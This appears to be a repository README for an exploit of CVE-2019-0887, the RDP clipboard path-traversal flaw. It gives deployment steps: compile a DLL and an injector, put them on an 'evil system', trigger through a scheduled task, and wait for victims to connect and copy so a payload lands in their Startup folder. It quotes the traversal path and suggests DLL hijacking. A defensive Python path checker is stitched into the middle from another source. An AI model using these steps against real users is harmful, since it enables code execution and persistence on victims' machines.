t43Wiu6/CVE-2019-0887
CVE-2019-0887

Compile the CVE-2019-0887 project and rename the output to winhlp.dll.

Compile the Install_Hook project and rename the output to hook.exe.

Be careful: both must be compiled for x64.

Put them onto the evil system like this:

c:\windows\hook.exe
c:\windows\winhlp.dll

c:\windows\winhlp64.exe # something evil 

If you want to change the paths, these are the places to edit:

# CVE-2019-0887/dllmain.cpp
WCHAR  evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR  efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };

# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");

Maybe use taskschd.msc to create a scheduled task, set the trigger "On connection to user session", and set the file path to hook.exe.

Wait for someone to connect to the evil system, copy something, and pwn...

Tip: why not use DLL hijacking?
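A defensive check for the kind of path held in `efile` above, as an added example that is not part of this repository: it flags a received file name that contains `..` segments, is absolute, resolves outside the intended destination folder, or lands in a Startup folder. The function name `triage`, the destination folder and the sample inputs other than the `efile` string are assumptions constructed for illustration.

```python
import ntpath

STARTUP = "\\start menu\\programs\\startup\\"

def _norm(path):
    # Collapse "." / ".." and mixed separators, then lowercase (Windows rules).
    return ntpath.normcase(ntpath.normpath(path))

def triage(dest_dir, name):
    """Return the reasons a received file name should be rejected (empty = ok).

    dest_dir: folder the user chose as the copy destination (assumed).
    name:     file name or relative path supplied by the remote side.
    """
    reasons = []
    segments = name.replace("/", "\\").split("\\")
    if ".." in segments:
        reasons.append("dot-dot segment")
    drive, _ = ntpath.splitdrive(name)
    if drive or ntpath.isabs(name):
        reasons.append("absolute path")
    base = _norm(dest_dir)
    full = _norm(ntpath.join(dest_dir, name))
    # The resolved path must be strictly below the destination folder.
    if not full.startswith(base.rstrip("\\") + "\\"):
        reasons.append("escapes destination")
    if STARTUP in full:
        reasons.append("startup folder")
    return reasons

# Constructed inputs; EFILE is the path string shown in dllmain.cpp on this page.
DEST = "C:\\Users\\alice\\Desktop"
EFILE = ("C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/"
         "Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe")
RELATIVE = "..\\..\\..\\Windows\\Temp\\a.txt"
BENIGN = "docs\\report.docx"

if __name__ == "__main__":
    for sample in (EFILE, RELATIVE, BENIGN):
        print(sample, "->", triage(DEST, sample) or "ok")
```

The same comparison works as a hunt over file-creation telemetry: normalise the logged target path and alert when it falls under a Startup folder or outside the directory the writing process was expected to use.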

About

exp for CVE-2019-0887
